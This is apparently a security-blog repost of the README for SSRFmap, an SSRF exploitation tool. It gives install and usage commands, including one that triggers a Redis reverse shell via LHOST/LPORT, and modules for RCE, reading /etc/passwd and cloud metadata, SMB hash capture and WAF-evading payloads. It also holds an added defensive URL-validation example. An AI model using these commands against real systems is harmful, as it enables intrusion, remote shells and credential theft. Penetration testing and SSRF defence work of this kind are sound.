
SSRFmap – Automatic SSRF Fuzzer and Exploitation Tool

by ethhack

SSRF is often used to leverage actions on other services; this framework aims to find and exploit those services easily. SSRFmap takes a Burp request file as input and a parameter to fuzz.

Server Side Request Forgery, or SSRF, is a vulnerability in which an attacker forces a server to perform requests on their behalf.

Basic install from the GitHub repository.

git clone https://github.com/swisskyrepo/SSRFmap
cd SSRFmap/
pip3 install -r requirements.txt
python3 ssrfmap.py

Usage:

ssrfmap.py [-h] [-r REQFILE] [-p PARAM] [-m MODULES] [-l HANDLER]
                  [--lhost LHOST] [--lport LPORT] [--uagent USERAGENT]
                  [--ssl [SSL]] [--level [LEVEL]]

Optional arguments:

  -h, --help          show this help message and exit
  -r REQFILE          SSRF Request file
  -p PARAM            SSRF Parameter to target
  -m MODULES          SSRF Modules to enable
  -l HANDLER          Start a handler for a reverse shell
  --lhost LHOST       LHOST reverse shell
  --lport LPORT       LPORT reverse shell
  --uagent USERAGENT  User Agent to use
  --ssl [SSL]         Use HTTPS without verification
  --level [LEVEL]     Level of test to perform (1-5, default: 1)

The default way to use this script is the following.

# Launch a portscan on localhost and read default files
python ssrfmap.py -r data/request.txt -p url -m readfiles,portscan

# Launch a portscan against an HTTPS endpoint using a custom user-agent
python ssrfmap.py -r data/request.txt -p url -m portscan --ssl --uagent "SSRFmapAgent"

# Triggering a reverse shell on a Redis
python ssrfmap.py -r data/request.txt -p url -m redis --lhost=127.0.0.1 --lport=4242 -l 4242

# -l creates a listener for the reverse shell on the specified port
# --lhost and --lport work like in Metasploit; these values are used to create a reverse shell payload
# --level: ability to tweak payloads in order to bypass some IDS/WAF, e.g. 127.0.0.1 -> [::] -> 0000: -> ...
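The --level variants above (127.0.0.1 rewritten as [::] and so on) are exactly what a string-matching blocklist in the target application fails against. The following defender-side check is an added example, not part of SSRFmap or its author's code: it vets a user-supplied URL by parsing the host into an address (or resolving it through an injectable resolver) and judging the address, not the spelling. The names check_outbound_url, is_public_address, FAKE_DNS and fake_resolve are assumptions for this example, and the DNS mappings are constructed so it runs offline.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}

def resolve_host(host):  # default: every address the name maps to (A and AAAA)
    return {info[4][0] for info in socket.getaddrinfo(host, None)}

def is_public_address(addr):
    """True only for addresses routable on the public Internet."""
    # Unwrap IPv4-mapped IPv6 (::ffff:a.b.c.d) so the inner IPv4 is judged.
    if isinstance(addr, ipaddress.IPv6Address) and addr.ipv4_mapped is not None:
        addr = addr.ipv4_mapped
    return not (addr.is_loopback or addr.is_unspecified or addr.is_private
                or addr.is_link_local or addr.is_multicast or addr.is_reserved)

def check_outbound_url(url, resolve=resolve_host):
    """Return (allowed, reason) for a user-supplied URL the server would fetch.
    Rejects non-http(s) schemes (so file:///etc/passwd never reaches the
    fetcher) and hosts that are, or resolve to, loopback, unspecified ([::]),
    RFC 1918 or link-local addresses (169.254.169.254 cloud metadata)."""
    try:
        parts = urlsplit(url)
    except ValueError:
        return False, "unparseable URL"
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        return False, f"scheme {parts.scheme!r} is not allowed"
    host = parts.hostname  # IPv6 brackets stripped, lower-cased
    if not host:
        return False, "missing host"
    try:
        addrs = {ipaddress.ip_address(host)}  # host is an IP literal
    except ValueError:
        try:  # hostname: vet every address it resolves to, not just the first
            addrs = {ipaddress.ip_address(a) for a in resolve(host)}
        except (OSError, ValueError):  # socket.gaierror is an OSError
            return False, f"cannot resolve {host!r}"
    for addr in addrs:
        if not is_public_address(addr):
            return False, f"{addr} is not a public address"
    return True, "ok"

# Constructed resolver so the example runs offline; the mappings are made up.
FAKE_DNS = {"intranet.example": {"10.0.0.5"}, "www.example.com": {"93.184.216.34"}}

def fake_resolve(host):
    if host not in FAKE_DNS:
        raise socket.gaierror(f"no such host: {host}")
    return FAKE_DNS[host]
```

Connect to the address that passed the check rather than resolving the name a second time, and re-run the check on every redirect target, so a DNS answer that changes between check and fetch cannot reopen the gap.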

A quick way to test the framework is with the data/example.py SSRF service.

FLASK_APP=data/example.py flask run &
python ssrfmap.py -r data/request.txt -p url -m readfiles

Modules

The following modules are already implemented and can be used with the -m argument.

Name          Description
fastcgi       FastCGI RCE
redis         Redis RCE
github        GitHub Enterprise RCE
zabbix        Zabbix RCE
mysql         MySQL command execution
docker        Docker info leaks via API
smtp          SMTP send mail
portscan      Scan ports for the host
networkscan   HTTP ping sweep over the network
readfiles     Read files such as /etc/passwd
alibaba       Read files from the provider (e.g. meta-data, user-data)
aws           Read files from the provider (e.g. meta-data, user-data)
gce           Read files from the provider (e.g. meta-data, user-data)
digitalocean  Read files from the provider (e.g. meta-data, user-data)
socksproxy    SOCKS4 proxy
smbhash       Force an SMB authentication via a UNC path
tomcat        Bruteforce attack against Tomcat Manager
